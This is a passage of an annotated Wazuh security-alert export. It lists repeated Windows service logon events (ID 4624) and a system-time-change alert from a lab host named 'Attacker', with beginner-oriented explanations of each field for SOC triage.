No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:52:57.5252040Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43720
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.420+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.420+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  39
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.399681
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:53:07.9865975Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43722
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.532+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.532+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  40
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.407015
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:30.0318323Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43726
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:06.641+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:06.641+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  41
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533926.414353
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:30.0970475Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43730
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  13300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

System time changed.

🧠 What happened? System time changed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:32:07.256+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:07.256+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  System time changed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60132
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'time_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.gpg13:  ['1.3', '4.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

